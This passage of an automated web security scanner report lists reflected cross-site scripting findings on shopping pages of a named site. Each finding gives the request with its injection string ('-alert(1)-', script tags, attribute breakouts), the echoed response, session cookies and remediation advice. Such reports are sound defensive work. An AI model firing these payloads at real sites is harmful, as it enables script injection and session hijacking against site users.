<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets64a2d'-alert(1)-'ba813a337b6/339412286/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.947. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae557'-alert(1)-'99f8cfcd546 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286ae557'-alert(1)-'99f8cfcd546/Equipment-Gadgets/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60243

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286ae557'-alert(1)-'99f8cfcd546/Equipment-Gadgets/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.948. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51346'-alert(1)-'c2e4df255bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets51346'-alert(1)-'c2e4df255bc/74 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets51346'-alert(1)-'c2e4df255bc/74';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.949. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/74

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1edda'-alert(1)-'67f26a7991b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/741edda'-alert(1)-'67f26a7991b HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Equipment-Gadgets/339412286/Equipment-Gadgets/741edda'-alert(1)-'67f26a7991b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.950. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b790b"><a>f5041150bc5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingb790b"><a>f5041150bc5/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:45:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingb790b"><a>f5041150bc5">
...[SNIP]...

4.951. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 657c8'-alert(1)-'879671d9669 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping657c8'-alert(1)-'879671d9669/Equipment-Gadgets/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping657c8'-alert(1)-'879671d9669/Equipment-Gadgets/339412286/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.952. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a0a2f<script>alert(1)</script>a7b6b47792c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Equipment-Gadgetsa0a2f<script>alert(1)</script>a7b6b47792c/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Equipment Gadgetsa0a2f<script>alert(1)</script>a7b6b47792c <a href="#" id="backlink">
...[SNIP]...

4.953. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d935'-alert(1)-'b97ae07adf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets9d935'-alert(1)-'b97ae07adf5/339412286/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Equipment-Gadgets9d935'-alert(1)-'b97ae07adf5/339412286/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.954. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9924'-alert(1)-'bccb86718fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286d9924'-alert(1)-'bccb86718fb/Mobile-Phones/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:08:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Equipment-Gadgets/339412286d9924'-alert(1)-'bccb86718fb/Mobile-Phones/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.955. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd851'-alert(1)-'40b90556b76 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phonesbd851'-alert(1)-'40b90556b76/55 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:14:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Equipment-Gadgets/339412286/Mobile-Phonesbd851'-alert(1)-'40b90556b76/55';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.956. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/55

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a104'-alert(1)-'03a1f3b248a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets/339412286/Mobile-Phones/559a104'-alert(1)-'03a1f3b248a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Equipment-Gadgets/339412286/Mobile-Phones/559a104'-alert(1)-'03a1f3b248a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.957. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcbba"><a>82e9685ba07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingfcbba"><a>82e9685ba07/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:41:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingfcbba"><a>82e9685ba07">
...[SNIP]...

4.958. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7c0'-alert(1)-'306c1730b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping4f7c0'-alert(1)-'306c1730b13/Equipment-Gadgets/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping4f7c0'-alert(1)-'306c1730b13/Equipment-Gadgets/339412286/Musical-Instruments/24';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.959. http://www.beirut.com/Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Equipment-Gadgets/339412286/Musical-Instruments/24

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 801e4'-alert(1)-'6a9e89cfa94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Equipment-Gadgets801e4'-alert(1)-'6a9e89cfa94/339412286/Musical-Instruments/24 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
